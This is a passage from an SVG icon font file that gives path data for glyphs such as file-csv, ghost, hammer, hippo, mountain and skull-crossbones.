c-6.2041 0.00195312 -12.9473 4.74219 -15.0498 10.5801l-37.4697 104.03c-3.52051 8.79004 1.21973 19.04 10.3896 21.3896c20.1699 5.17969 41.2607 8 63.0303 8s42.8604 -2.82031 63.0303 -8zM112 160c8.83984 0 16 -7.16016 16 -16v-64c0 -8.83984 -7.16016 -16 -16 -16
h-96c-8.83984 0 -16 7.16016 -16 16v64c0 8.83984 7.16016 16 16 16h96zM112 32c8.83984 0 16 -7.16016 16 -16v-64c0 -8.83984 -7.16016 -16 -16 -16h-96c-8.83984 0 -16 7.16016 -16 16v64c0 8.83984 7.16016 16 16 16h96zM189.31 315.67
c2.85059 -7.12012 -0.0195312 -14.8799 -6.2998 -19.29c-6 -4.2002 -11.6094 -8.89941 -16.79 -14.0498c-5.4502 -5.41016 -13.5996 -6.86035 -20.1094 -2.79004l-82.9307 51.8301c-8.06934 5.04004 -10.2793 16.2002 -4.21973 23.5195
c16.7148 20.1758 48.7969 47.0068 71.6104 59.8906c8.29004 4.67969 18.8896 0.519531 22.4199 -8.31055zM398.18 192c-7.95996 0 -14.0801 6.25 -15.0098 14.1602c-1.08984 9.32031 -3.22949 18.3301 -6.24023 26.9395c-2.55957 7.34082 -0.25 15.46 6.33984 19.5801
l82.8105 51.7607c8.04004 5.01953 18.9902 2.16992 22.9297 -6.4502c10.7334 -23.498 20.791 -63.4902 22.4502 -89.2705c0.589844 -9.08984 -7.0498 -16.7197 -16.1504 -16.7197h-97.1299zM453.03 354.89c6.06934 -7.31934 3.84961 -18.4795 -4.2207 -23.5098
l-82.9297 -51.8301c-6.50977 -4.06934 -14.6699 -2.62012 -20.1104 2.79004c-5.17969 5.15039 -10.7891 9.85059 -16.7891 14.0498c-6.28027 4.40039 -9.15039 12.1602 -6.30078 19.2803l36.3203 90.7998c3.54004 8.83008 14.1396 12.9902 22.4199 8.31055
c22.8135 -12.8838 54.8945 -39.7148 71.6104 -59.8906zM496 160c8.83984 0 16 -7.16016 16 -16v-64c0 -8.83984 -7.16016 -16 -16 -16h-96c-8.83984 0 -16 7.16016 -16 16v64c0 8.83984 7.16016 16 16 16h96zM496 32c8.83984 0 16 -7.16016 16 -16v-64
c0 -8.83984 -7.16016 -16 -16 -16h-96c-8.83984 0 -16 7.16016 -16 16v64c0 8.83984 7.16016 16 16 16h96zM240 270.38c5.23047 0.889648 10.5195 1.62012 16 1.62012s10.7695 -0.730469 16 -1.62012v-294.38c0 -4.41992 -3.58008 -8 -8 -8h-16c-4.41992 0 -8 3.58008 -8 8
v294.38zM176 228.87c8.16016 12.2998 19.2197 22.3203 32 29.7695v-282.64c0 -4.41992 -3.58008 -8 -8 -8h-16c-4.41992 0 -8 3.58008 -8 8v252.87zM304 258.64c12.7803 -7.44922 23.8398 -17.4697 32 -29.7695v-252.87c0 -4.41992 -3.58008 -8 -8 -8h-16
c-4.41992 0 -8 3.58008 -8 8v282.64z" />
    <glyph glyph-name="file-csv" unicode="&#xf6dd;" horiz-adv-x="384" 
d="M224 312c0 -13.2002 10.7998 -24 24 -24h136v-328c0 -13.2998 -10.7002 -24 -24 -24h-336c-13.2998 0 -24 10.7002 -24 24v464c0 13.2998 10.7002 24 24 24h200v-136zM128 168v16c0 4.41992 -3.58008 8 -8 8h-8c-26.5098 0 -48 -21.4902 -48 -48v-32
c0 -26.5098 21.4902 -48 48 -48h8c4.41992 0 8 3.58008 8 8v16c0 4.41992 -3.58008 8 -8 8h-8c-8.83984 0 -16 7.16016 -16 16v32c0 8.83984 7.16016 16 16 16h8c4.41992 0 8 3.58008 8 8zM172.27 64c23.3906 0 42.4004 17.3301 42.3906 38.6201
c0 10.6602 -4.86035 20.9199 -13.3301 28.1396l-21.8896 18.7705c-1.37012 1.17969 -2.12012 2.54004 -2.12012 3.83984c0 3.12012 4.45996 6.62012 10.4102 6.62012h12.2695c4.41992 0 8 3.58008 8 8v16c0 4.41992 -3.58008 8 -8 8h-12.25
c-23.3896 0 -42.4102 -17.3203 -42.4102 -38.6201c0 -10.6602 4.86035 -20.9199 13.3301 -28.1396l21.8896 -18.7705c1.37012 -1.17969 2.12012 -2.54004 2.12012 -3.83984c0 -3.12012 -4.45996 -6.62012 -10.4102 -6.62012h-12.2695c-4.41992 0 -8 -3.58008 -8 -8v-16
c0 -4.41992 3.58008 -8 8 -8h12.2695zM256 184c0 4.41992 -3.58008 8 -8 8h-16c-4.41992 0 -8 -3.58008 -8 -8v-20.7998c0 -35.4805 12.8799 -68.8906 36.2803 -94.0898c3.01953 -3.25 7.26953 -5.11035 11.7197 -5.11035s8.7002 1.86035 11.7197 5.11035
c23.4004 25.1992 36.2803 58.6094 36.2803 94.0898v20.7998c0 4.41992 -3.58008 8 -8 8h-16c-4.41992 0 -8 -3.58008 -8 -8v-20.7998c0 -20.2705 -5.7002 -40.1807 -16 -56.8799c-10.2998 16.71 -16 36.6094 -16 56.8799v20.7998zM377 343c4.5 -4.5 7 -10.5996 7 -16.9004
v-6.09961h-128v128h6.09961c6.40039 0 12.5 -2.5 17 -7z" />
    <glyph glyph-name="fist-raised" unicode="&#xf6de;" horiz-adv-x="384" 
d="M255.98 288h-48.0303c-5.62988 0 -10.9502 -1.15039 -15.9697 -2.92969v146.93c0 8.83984 7.15918 16 16 16h32c8.83984 0 16 -7.16016 16 -16v-144zM383.98 192.01l0.0195312 -88.2197v-0.0107422c0 -21.9551 -12.5977 -52.373 -28.1201 -67.8994l-35.9102 -35.9199
v-63.96h-255.979v64l-26.5 26.5098c-24.0098 24.0098 -37.4902 56.5605 -37.4902 90.5098v77.9307c5.03027 -1.7998 10.3604 -2.9502 16 -2.9502h32c12.3301 0 23.4805 4.80957 32 12.4902c8.50977 -7.66992 19.6602 -12.4805 32 -12.4805h32
c7.91016 0 15.2803 2.11035 21.8701 5.52051c7.46973 -16.3301 21.5996 -28.9404 38.8701 -34.4502c-17.1104 -14.8203 -31.5801 -34.4805 -47.3105 -58.0801l-6.30957 -9.46973c-0.742188 -1.1123 -1.34375 -3.09961 -1.34375 -4.43652
c0 -2.36328 1.59668 -5.34375 3.56348 -6.65332l13.3105 -8.88086c1.11133 -0.741211 3.09863 -1.34375 4.43555 -1.34375c2.36328 0 5.34473 1.59668 6.6543 3.56445l6.30957 9.46973c31.8906 47.8398 51.5303 70.2695 96.0498 72.5498
c4.29004 0.219727 7.88086 3.70996 7.88086 8v16.2002c0 4.41992 -3.52051 8 -13.2002 8h-35.2607c-26.2695 0 -47.5693 21.3203 -47.5693 47.5898v0.560547c0 8.7793 7.12012 15.8496 15.8994 15.8496h112.141c35.3301 0 63.9795 -28.6504 63.9902 -63.9902zM351.97 282.1
c-10.0596 3.59082 -20.7197 5.90039 -32 5.90039h-32v112c0 8.83984 7.16016 16 16 16h32c8.83984 0 16 -7.16016 16 -16v-117.9zM16 224c-8.83984 0 -16 7.16016 -16 16v128c0 8.83984 7.16016 16 16 16h32c8.83984 0 16 -7.16016 16 -16v-128
c0 -8.83984 -7.16016 -16 -16 -16h-32zM111.99 224c-8.83984 0 -16 7.16016 -16 16v160c0 8.83984 7.16016 16 16 16h32c8.83984 0 16 -7.16016 16 -16v-160c0 -8.83984 -7.16016 -16 -16 -16h-32z" />
    <glyph glyph-name="ghost" unicode="&#xf6e2;" horiz-adv-x="384" 
d="M186.1 447.91c108.73 3.25977 197.9 -83.9102 197.9 -191.91v-271.97c0 -14.25 -17.2305 -21.3906 -27.3096 -11.3105l-24.9209 18.5303c-6.65918 4.95996 -16 3.99023 -21.5098 -2.20996l-42.9502 -48.3496c-6.25 -6.25 -16.3799 -6.25 -22.6299 0l-40.7197 45.8496
c-6.36035 7.16992 -17.5498 7.16992 -23.9199 0l-40.7197 -45.8496c-6.25 -6.25 -16.3799 -6.25 -22.6299 0l-42.9502 48.3496c-5.50977 6.2002 -14.8506 7.16016 -21.5098 2.20996l-24.9209 -18.5303c-10.0791 -10.0801 -27.3096 -2.9502 -27.3096 11.3105v263.92
c0 105.13 81.0098 196.81 186.1 199.96zM128 224c17.6699 0 32 14.3301 32 32s-14.3301 32 -32 32s-32 -14.3301 -32 -32s14.3301 -32 32 -32zM256 224c17.6699 0 32 14.3301 32 32s-14.3301 32 -32 32s-32 -14.3301 -32 -32s14.3301 -32 32 -32z" />
    <glyph glyph-name="hammer" unicode="&#xf6e3;" horiz-adv-x="576" 
d="M571.31 254.06c6.25 -6.25 6.25 -16.3799 0.0205078 -22.6191l-90.5098 -90.5107c-6.25 -6.25 -16.3799 -6.25 -22.6299 0l-22.6309 22.6299c-6.25 6.25 -6.25 16.3809 0 22.6309l11.3105 11.3096l-28.9004 28.9004
c-21.3096 -5.63086 -44.8994 -0.360352 -61.6094 16.3496l-49.1406 49.1396c-12.0098 12 -18.75 28.2803 -18.75 45.25v18.75l-90.5098 45.25c62.4902 62.4805 163.8 62.4805 226.28 0l45.25 -45.25c16.71 -16.71 21.9795 -40.2998 16.3496 -61.6094l28.9004 -28.9004
l11.3096 11.3105c6.25 6.25 16.3799 6.25 22.6299 0zM284.59 269.26l49.1406 -49.1396c3.53906 -3.54004 7.47949 -6.5 11.4395 -9.41016l-238.13 -255.07c-23.8799 -25.5801 -64.2002 -26.2695 -88.9297 -1.5293c-24.7305 24.7393 -24.04 65.0498 1.5293 88.9297
l255.101 238.17c3.00977 -4.16016 6.14941 -8.25 9.84961 -11.9502z" />
    <glyph glyph-name="hanukiah" unicode="&#xf6e6;" horiz-adv-x="640" 
d="M232 288h16c4.41992 0 8 -3.58008 8 -8v-120h-32v120c0 4.41992 3.58008 8 8 8zM168 288h16c4.41992 0 8 -3.58008 8 -8v-120h-32v120c0 4.41992 3.58008 8 8 8zM392 288h16c4.41992 0 8 -3.58008 8 -8v-120h-32v120c0 4.41992 3.58008 8 8 8zM456 288h16
c4.41992 0 8 -3.58008 8 -8v-120h-32v120c0 4.41992 3.58008 8 8 8zM544 280v-120h-32v120c0 4.41992 3.58008 8 8 8h16c4.41992 0 8 -3.58008 8 -8zM104 288h16c4.41992 0 8 -3.58008 8 -8v-120h-32v120c0 4.41992 3.58008 8 8 8zM624 288c8.83984 0 16 -7.16016 16 -16
v-112c0 -53.0195 -42.9805 -96 -96 -96h-192v-64h176c8.83984 0 16 -7.16016 16 -16v-32c0 -8.83984 -7.16016 -16 -16 -16h-416c-8.83984 0 -16 7.16016 -16 16v32c0 8.83984 7.16016 16 16 16h176v64h-192c-53.0195 0 -96 42.9805 -96 96v112c0 8.83984 7.16016 16 16 16
h32c8.83984 0 16 -7.16016 16 -16v-112c0 -17.6699 14.3301 -32 32 -32h192v192c0 8.83984 7.16016 16 16 16h32c8.83984 0 16 -7.16016 16 -16v-192h192c17.6699 0 32 14.3301 32 32v112c0 8.83984 7.16016 16 16 16h32zM608 320c-13.25 0 -24 11.9502 -24 26.6699
s24 53.3301 24 53.3301s24 -38.5996 24 -53.3301c0 -14.7295 -10.75 -26.6699 -24 -26.6699zM32 320c-13.25 0 -24 11.9502 -24 26.6699s24 53.3301 24 53.3301s24 -38.5996 24 -53.3301c0 -14.7295 -10.75 -26.6699 -24 -26.6699zM320 368
c-13.25 0 -24 11.9502 -24 26.6699s24 53.3301 24 53.3301s24 -38.5996 24 -53.3301c0 -14.7295 -10.75 -26.6699 -24 -26.6699zM112 320c-13.25 0 -24 11.9502 -24 26.6699s24 53.3301 24 53.3301s24 -38.5996 24 -53.3301c0 -14.7295 -10.75 -26.6699 -24 -26.6699z
M176 320c-13.25 0 -24 11.9502 -24 26.6699s24 53.3301 24 53.3301s24 -38.5996 24 -53.3301c0 -14.7295 -10.75 -26.6699 -24 -26.6699zM240 320c-13.25 0 -24 11.9502 -24 26.6699s24 53.3301 24 53.3301s24 -38.5996 24 -53.3301
c0 -14.7295 -10.75 -26.6699 -24 -26.6699zM400 320c-13.25 0 -24 11.9502 -24 26.6699s24 53.3301 24 53.3301s24 -38.5996 24 -53.3301c0 -14.7295 -10.75 -26.6699 -24 -26.6699zM464 320c-13.25 0 -24 11.9502 -24 26.6699s24 53.3301 24 53.3301
s24 -38.5996 24 -53.3301c0 -14.7295 -10.75 -26.6699 -24 -26.6699zM528 320c-13.25 0 -24 11.9502 -24 26.6699s24 53.3301 24 53.3301s24 -38.5996 24 -53.3301c0 -14.7295 -10.75 -26.6699 -24 -26.6699z" />
    <glyph glyph-name="hat-wizard" unicode="&#xf6e8;" 
d="M496 0c8.83984 0 16 -7.16016 16 -16v-32c0 -8.83984 -7.16016 -16 -16 -16h-480c-8.83984 0 -16 7.16016 -16 16v32c0 8.83984 7.16016 16 16 16h480zM192 64l16 -32h-144l110.96 249.66c9.4043 21.1611 33.3545 47.6611 53.46 59.1494l187.58 107.19l-56.2998 -168.92
c-1.81543 -5.43945 -3.28809 -14.5078 -3.28809 -20.2412c0 -7.25098 2.31934 -18.5449 5.17773 -25.209l86.4102 -201.63h-208l16 32l64 32l-64 32l-32 64l-32 -64l-64 -32zM256 288l-32 -16l32 -16l16 -32l16 32l32 16l-32 16l-16 32z" />
    <glyph glyph-name="hiking" unicode="&#xf6ec;" horiz-adv-x="383" 
d="M80.9502 -24.2305l34.5596 138.221l52.7803 -52.7803l-25.2402 -100.97c-3.64941 -14.5303 -16.6895 -24.2305 -31.0195 -24.2305c-2.58008 0 -5.19043 0.290039 -7.7998 0.950195c-17.1406 4.28027 -27.5605 21.6504 -23.2803 38.8096zM95.8398 171.89
c-2.18945 -8.41992 -11.0801 -13.54 -19.8701 -11.4395l-63.5596 15.25c-8.78027 2.10938 -14.1104 10.6396 -11.9199 19.0596l25.2695 98.1299c10.9707 42.1006 55.4404 67.6904 99.3203 57.1699c8.78027 -2.10938 14.1104 -10.6396 11.9199 -19.0596zM368 288
c8.83984 0 16 -7.16016 15.9902 -16v-320.01c0 -8.83984 -7.16016 -16 -16 -16h-16c-8.83984 0 -16 7.16016 -16 16v240h-48c-8.48047 0 -16.6201 3.37988 -22.6201 9.37988l-22.4297 22.4297l-19.8906 -79.5693
c-0.129883 -0.520508 -0.469727 -0.910156 -0.620117 -1.41016l46.8203 -46.8203c12.0898 -12.0898 18.75 -28.1602 18.75 -45.25v-82.75c0 -17.6699 -14.3301 -32 -32 -32s-32 14.3301 -32 32v82.75l-86.6201 86.6201c-5.17383 5.1748 -9.37402 15.3154 -9.37402 22.6338
c0 2.17285 0.427734 5.64746 0.954102 7.75586l26.9199 107.721c6.56055 26.2197 30.0098 44.5195 57.0303 44.5195c15.7002 0 30.4697 -6.11035 41.5596 -17.2197l46.7803 -46.7803h34.75v16c0 8.83984 7.16016 16 16 16h16zM240 352c-26.5098 0 -48 21.4902 -48 48
s21.4902 48 48 48s48 -21.4902 48 -48s-21.4902 -48 -48 -48z" />
    <glyph glyph-name="hippo" unicode="&#xf6ed;" horiz-adv-x="640" 
d="M581.12 351.8c34.0898 -0.189453 58.8799 -33.6895 58.8799 -67.7803v-92.0195c0 -17.6699 -14.3301 -32 -32 -32v-32c0 -8.83984 -7.16016 -16 -16 -16h-32c-8.83984 0 -16 7.16016 -16 16v32h-128v-176c0 -8.83984 -7.16016 -16 -16 -16h-64
c-8.83984 0 -16 7.16016 -16 16v70.79c-32.3496 -14.3604 -70.7197 -22.79 -112 -22.79s-79.6504 8.42969 -112 22.79v-70.79c0 -8.83984 -7.16016 -16 -16 -16h-64c-8.83984 0 -16 7.16016 -16 16v240c0 88.3604 85.96 160 192 160
c49.2402 0 94.0098 -15.5801 128 -40.9805v48.9805c0 13.2598 10.75 24 24 24h16c13.25 0 24 -10.7402 24 -24v-13.8799c10.0498 3.58008 20.7197 5.87988 32 5.87988c39.8301 0 73.9805 -24.2695 88.5195 -58.8203c24.1006 9.04004 48.9307 26.7705 76.6006 26.6201z
M448 272c8.83984 0 16 7.16016 16 16s-7.16016 16 -16 16s-16 -7.16016 -16 -16s7.16016 -16 16 -16z" />
    <glyph glyph-name="horse" unicode="&#xf6f0;" horiz-adv-x="575" 
d="M575.92 371.4l0.0605469 -77.71v-0.0292969c0 -11.9609 -9.01465 -25.2715 -20.1201 -29.7109l-32.5508 -13.0205c-15.4395 -6.17969 -33.04 0.5 -40.4893 15.3701l-18.9004 37.7002l-16 7.11035v-102.471c0.00976562 -0.219727 0.0800781 -0.419922 0.0800781 -0.639648
c0 -30.4697 -12.2598 -58.0303 -32 -78.2197v-177.78c0 -8.83984 -7.16016 -16 -16 -16h-64c-8.83984 0 -16 7.16016 -16 16v150.4l-133.97 22.3301l-23.8398 -63.5908l26.3096 -105.26c2.53027 -10.0996 -5.11035 -19.8799 -15.5195 -19.8799h-65.9609h-0.000976562
c-6.89453 0 -13.8428 5.42969 -15.5088 12.1201l-24.8496 99.4102c-1.05664 4.2207 -1.91406 11.1777 -1.91406 15.5293c0 6.40332 1.8252 16.4648 4.07422 22.46l25.7197 68.6006c-18.7002 17.5195 -30.54 42.2402 -30.54 69.8799
c0 2.62988 0.570312 5.09961 0.780273 7.67969c-9.91016 -7.29004 -16.7803 -18.46 -16.7803 -31.6797v-56c0 -8.83984 -7.16016 -16 -16 -16h-16c-8.83984 0 -16 7.16016 -16 16v56c0 48.5303 39.4697 88 88 88v-1.11035c17.5996 20.1299 43.1602 33.1104 72 33.1104
h159.92c0 70.6904 57.3105 128 128 128h119.98c5.05957 0 8.94922 -4.67969 7.92969 -9.63965c-2.67969 -13.1699 -11.1201 -23.8203 -22.1797 -30.6602c5.10938 -5.37988 9.90918 -10.4697 13.6895 -14.5c5.56055 -5.93066 8.57031 -13.6699 8.58008 -21.7998zM511.92 352
c8.83984 0 16 7.16016 16 16s-7.16016 16 -16 16s-16 -7.16016 -16 -16s7.16016 -16 16 -16z" />
    <glyph glyph-name="house-damage" unicode="&#xf6f1;" horiz-adv-x="576" 
d="M288 333.04l218.74 -192.94c1.54004 -1.37988 3.55957 -2.04004 5.25977 -3.19922v-184.9c0 -8.83984 -7.16016 -16 -16 -16h-176.19l-39.9199 55.25l104.11 64l-148.05 136.78l60.1602 -119.221l-104.11 -64l37.2305 -72.8096h-149.23c-8.83984 0 -16 7.16016 -16 16
v184.94c1.78027 1.20996 3.84961 1.88965 5.46973 3.34961zM570.69 211.72c6.5791 -5.89941 7.11914 -16.0195 1.21973 -22.5898l-21.4004 -23.8203c-5.91016 -6.56934 -16.0293 -7.10938 -22.5996 -1.20996l-229.32 202.271c-6.0498 5.33008 -15.1201 5.33008 -21.1699 0
l-229.32 -202.28c-6.58008 -5.91016 -16.6992 -5.35938 -22.5996 1.20996l-21.4004 23.8203c-5.90918 6.58008 -5.35938 16.6895 1.20996 22.5996l255.99 226.011c7.60059 6.85938 17.1406 10.2793 26.7002 10.2695s19.1201 -3.4502 26.75 -10.3096l101.25 -89.3809v51.6904
c0 8.83984 7.16016 16 16 16h64c8.83984 0 16 -7.16016 16 -16v-136.45z" />
    <glyph glyph-name="hryvnia" unicode="&#xf6f2;" horiz-adv-x="384" 
d="M368 208h-99.7002l-34.6699 -32h134.37c8.83984 0 16 -7.16016 16 -16v-32c0 -8.83984 -7.16016 -16 -16 -16h-203.7l-29.4902 -27.2197c-4.3291 -4 -6.80957 -9.66992 -6.80957 -15.5801c0 -11.6807 9.50977 -21.2002 21.2002 -21.2002h83.6299h0.00195312
c4.79395 0 11.6748 2.49121 15.3584 5.55957l11.75 9.80078c10.1895 8.48926 25.3193 7.12012 33.8096 -3.07031l20.4902 -24.5898c8.49023 -10.1807 7.10938 -25.3105 -3.07031 -33.7998l-11.7695 -9.81055c-18.6807 -15.5596 -42.2207 -24.0898 -66.54 -24.0898h-78.8203
c-37.1396 0 -73.3799 17.8496 -92.0498 49.9502c-17.8701 30.7197 -17.54 65.4199 -4.12988 94.0498h-41.8604c-8.83984 0 -16 7.16016 -16 16v32c0 8.83984 7.16016 16 16 16h99.7002l34.6699 32h-134.37c-8.83984 0 -16 7.16016 -16 16v32c0 8.83984 7.16016 16 16 16
h203.7l29.4902 27.21c4.3291 4 6.80957 9.66992 6.80957 15.5801c0 11.6797 -9.50977 21.2002 -21.2002 21.2002h-83.6201c-5.62012 0 -11.0693 -1.9707 -15.3896 -5.57031l-11.7305 -9.78027c-10.1895 -8.48926 -25.3193 -7.12012 -33.8096 3.07031l-20.4902 24.5898
c-8.49023 10.1807 -7.10938 25.3105 3.07031 33.7998l11.7695 9.81055c18.6807 15.5596 42.2207 24.0898 66.54 24.0898h78.8203c37.1396 0 73.3799 -17.8398 92.0498 -49.9502c17.8701 -30.7197 17.54 -65.4199 4.12988 -94.0498h41.8604c8.83984 0 16 -7.16016 16 -16v-32
c0 -8.83984 -7.16016 -16 -16 -16z" />
    <glyph glyph-name="mask" unicode="&#xf6fa;" horiz-adv-x="640" 
d="M320.67 384c449.09 0 348.32 -384 158.46 -384c-39.8994 0 -77.4697 20.6904 -101.41 55.8604l-25.7295 37.79c-15.6602 22.9893 -46.9707 22.9893 -62.6299 0l-25.7305 -37.79c-23.9502 -35.1699 -61.5195 -55.8604 -101.42 -55.8604c-199.11 0 -284.14 384 158.46 384z
M184 139.64c41.0596 0 67.7598 25.6504 80.0801 41.0508c5.22949 6.54004 5.22949 16.0996 0 22.6299c-12.3203 15.3896 -39.0098 41.0498 -80.0801 41.0498s-67.7598 -25.6504 -80.0801 -41.0498c-5.22949 -6.54004 -5.22949 -16.1006 0 -22.6299
c12.3203 -15.3906 39.0205 -41.0508 80.0801 -41.0508zM456 139.64c41.0596 0 67.7598 25.6504 80.0801 41.0508c5.22949 6.54004 5.22949 16.0996 0 22.6299c-12.3203 15.3896 -39.0098 41.0498 -80.0801 41.0498s-67.7598 -25.6504 -80.0801 -41.0498
c-5.22949 -6.54004 -5.22949 -16.1006 0 -22.6299c12.3203 -15.3906 39.0205 -41.0508 80.0801 -41.0508z" />
    <glyph glyph-name="mountain" unicode="&#xf6fc;" horiz-adv-x="640" 
d="M634.92 -14.7002c2.80566 -4.3623 5.08301 -12.1133 5.08301 -17.3008c0 -4.50586 -1.75293 -11.374 -3.91309 -15.3291c-5.60938 -10.2803 -16.3799 -16.6699 -28.0898 -16.6699h-576h-0.00390625c-10.4795 0 -23.0615 7.46387 -28.0859 16.6602
c-2.16016 3.95605 -3.91309 10.8262 -3.91309 15.334c0 5.18848 2.27734 12.9414 5.08301 17.3057l288 448c5.88965 9.16016 16.0303 14.7002 26.9199 14.7002s21.0303 -5.54004 26.9199 -14.7002zM320 356.82l-102.06 -158.761l38.0596 -38.0596l64 64h85.3896z" />
    <glyph glyph-name="network-wired" unicode="&#xf6ff;" horiz-adv-x="640" 
d="M640 184c0 -8.83984 -7.16016 -16 -16 -16h-104v-40h56c17.6699 0 32 -14.3301 32 -32v-128c0 -17.6699 -14.3301 -32 -32 -32h-160c-17.6699 0 -32 14.3301 -32 32v128c0 17.6699 14.3301 32 32 32h56v40h-304v-40h56c17.6699 0 32 -14.3301 32 -32v-128
c0 -17.6699 -14.3301 -32 -32 -32h-160c-17.6699 0 -32 14.3301 -32 32v128c0 17.6699 14.3301 32 32 32h56v40h-104c-8.83984 0 -16 7.16016 -16 16v16c0 8.83984 7.16016 16 16 16h280v40h-72c-17.6699 0 -32 14.3301 -32 32v128c0 17.6699 14.3301 32 32 32h192
c17.6699 0 32 -14.3301 32 -32v-128c0 -17.6699 -14.3301 -32 -32 -32h-72v-40h280c8.83984 0 16 -7.16016 16 -16v-16zM256 320h128v64h-128v-64zM192 0v64h-96v-64h96zM544 0v64h-96v-64h96z" />
    <glyph glyph-name="otter" unicode="&#xf700;" horiz-adv-x="640" 
d="M608 416c17.6699 0 32 -14.3301 32 -32v-32c0 -53.0195 -42.9805 -96 -96 -96h-22.8604l-92.4697 -49.79l55.1104 -110.21h28.2197c17.6699 0 32 -14.3301 32 -32v-16c0 -8.83984 -7.16016 -16 -16 -16h-80l-74.5098 144.5l-149.49 -80.5h64
c17.6699 0 32 -14.3301 32 -32v-16c0 -8.83984 -7.16016 -16 -16 -16h-224c-8.83008 0 -16 -7.16992 -16 -16s7.16992 -16 16 -16h112c17.6699 0 32 -14.3301 32 -32s-14.3301 -32 -32 -32h-108.47c-39.3799 0 -75.5205 26.9004 -82.2803 65.7002
c-4.91016 28.1201 5 54.2197 23.1904 71.7998c23.5596 22.75 39.5596 52.1396 39.5596 84.8896v1.61035c0 106.04 85.96 192 192 192h56l153.25 87.5703c9.66992 5.51953 20.6104 8.42969 31.75 8.42969h20.4902h0.0126953c14.6328 0 34.9033 -8.40039 45.2471 -18.75
l13.25 -13.25h32zM512 400c-8.83984 0 -16 -7.16016 -16 -16s7.16016 -16 16 -16s16 7.16016 16 16s-7.16016 16 -16 16zM544 304c20.8301 0 38.4297 13.4199 45.0498 32h-77.0498l-118.57 -59.29l13.7705 -27.5498l101.84 54.8398h34.96z" />
    <glyph glyph-name="ring" unicode="&#xf70b;" 
d="M256 384c145.94 0 256 -61.9102 256 -144v-98.1299c0 -78.3506 -114.62 -141.87 -256 -141.87s-256 63.5195 -256 141.87v98.1299c0 82.0898 110.06 144 256 144zM256 320c-106.04 0 -192 -35.8203 -192 -80c0 -9.25977 3.96973 -18.1201 10.9102 -26.3896
c44.9395 26.1797 108.859 42.3896 181.09 42.3896s136.15 -16.21 181.09 -42.3896c6.94043 8.26953 10.9102 17.1299 10.9102 26.3896c0 44.1797 -85.96 80 -192 80zM120.43 183.36c34.7305 -14.4307 82.6406 -23.3604 135.57 -23.3604s100.84 8.92969 135.57 23.3604
c-34.6104 14.71 -81.21 24.6396 -135.57 24.6396s-100.96 -9.92969 -135.57 -24.6396z" />
    <glyph glyph-name="running" unicode="&#xf70c;" horiz-adv-x="416" 
d="M272 352c-26.5098 0 -48 21.4902 -48 48s21.4902 48 48 48s48 -21.4902 48 -48s-21.4902 -48 -48 -48zM113.69 130.53c7.92969 -17.2402 20.6699 -32.3799 37.9893 -42.6104l10.6699 -6.2998l-8.79004 -20.5205c-7.5293 -17.6494 -24.8594 -29.0898 -44.1094 -29.0898
h-77.4502c-17.6699 0 -32 14.3301 -32 32s14.3301 32 32 32h66.8896zM384 224.01c17.6699 0 32 -14.3193 32 -31.9902c0 -17.6699 -14.3301 -32 -32 -32h-53.9902c-18.1895 0 -35.1094 10.5508 -43.1094 26.8906l-20.2705 41.4297l-31.3096 -78.2803l61.2393 -36.1396
c18.75 -11.3096 27.5508 -33.6201 21.6406 -54.3896l-31.6406 -101.061c-4.29004 -13.6797 -16.9092 -22.4502 -30.5195 -22.4502c-3.16992 0 -6.38965 0.480469 -9.58008 1.48047c-16.8604 5.28027 -26.25 23.2305 -20.9697 40.0898l27.4697 87.7305l-84.9795 50.1699
c-27.6104 16.2998 -38.9209 50.8301 -26.3008 80.3096l37.46 87.3906l-14.6992 4.36914c-7.83008 1.86035 -17.6006 -0.25 -25.2705 -6.13965l-39.6895 -30.4102c-14.0205 -10.7402 -34.0908 -8.10938 -44.8604 5.91992c-10.7705 14.0303 -8.11035 34.1104 5.91992 44.8604
l39.6699 30.4102c23.0703 17.6895 52.54 23.9395 80.8398 17.1396l71.0801 -21.1396c26.3301 -6.70996 49.2803 -25.3906 61.7803 -50.9404l26.0596 -53.25h44.0303z" />
    <glyph glyph-name="scroll" unicode="&#xf70e;" horiz-adv-x="640" 
d="M48 448c26.4697 0 48 -21.5303 48 -48v-80h-80c-8.83984 0 -16 7.16016 -16 16v64c0 26.4697 21.5303 48 48 48zM256 35.4297c0 -31.8896 -21.7803 -61.4297 -53.25 -66.5498c-40.0996 -6.53027 -74.75 24.25 -74.75 63.1201v368c0 18.0801 -6.25977 34.5898 -16.4102 48
h336.41c52.9404 0 96 -43.0596 96 -96v-256h-288v-60.5703zM288 64h336c8.83984 0 16 -7.16016 16 -16c0 -61.8604 -50.1396 -112 -112 -112h-336c52.9404 0 96 43.0703 96 96v32z" />
    <glyph glyph-name="skull-crossbones" unicode="&#xf714;" horiz-adv-x="448" 
d="M439.15 -5.05957c7.89941 -3.9502 11.1094 -13.5605 7.15918 -21.4707l-14.3096 -28.6299c-3.95996 -7.89941 -13.5703 -11.0996 -21.4697 -7.14941l-186.53 90.7197l-186.52 -90.7197c-7.91016 -3.95996 -17.5205 -0.75 -21.4707 7.14941l-14.3096 28.6299
c-3.95996 7.91016 -0.75 17.5205 7.14941 21.4707l141.98 69.0596l-141.99 69.0596c-7.89941 3.9502 -11.0996 13.5605 -7.14941 21.46l14.3096 28.6309c3.95996 7.90918 13.5703 11.1094 21.4697 7.15918l186.53 -90.7197l186.53 90.7197
c7.91016 3.9502 17.5195 0.740234 21.4697 -7.15918l14.3096 -28.6309c3.95996 -7.89941 0.75 -17.5098 -7.14941 -21.46l-141.99 -69.0596zM150 210.72c-41.7803 22.4102 -70 62.75 -70 109.28c0 70.6904 64.4697 128 144 128s144 -57.3096 144 -128
c0 -46.5303 -28.2197 -86.8701 -70 -109.28l5.5 -25.8701c2.66992 -12.6191 -5.41992 -24.8496 -16.4502 -24.8496h-126.08c-11.0293 0 -19.1201 12.2305 -16.4502 24.8496zM280 336c-17.6504 0 -32 -14.3496 -32 -32s14.3496 -32 32 -32s32 14.3496 32 32
s-14.3496 32 -32 32zM168 336c-17.6504 0 -32 -14.3496 -32 -32s14.3496 -32 32 -32s32 14.3496 32 32s-14.3496 32 -32 32z" />
    <glyph glyph-name="slash" unicode="&#xf715;" horiz-adv-x="640" 
d="M594.53 -60.6299l-588.351 454.729c-6.96973 5.41992 -8.22949 15.4707 -2.80957 22.4502l19.6396 25.2705c5.41992 6.97949 15.4805 8.23926 22.46 2.80957l588.351 -454.729c6.96973 -5.41992 8.22949 -15.4707 2.80957 -22.4502l-19.6396 -25.2705
c-5.41992 -6.97949 -15.4805 -8.22949 -22.46 -2.80957z" />
    <glyph glyph-name="spider" unicode="&#xf717;" horiz-adv-x="576" 
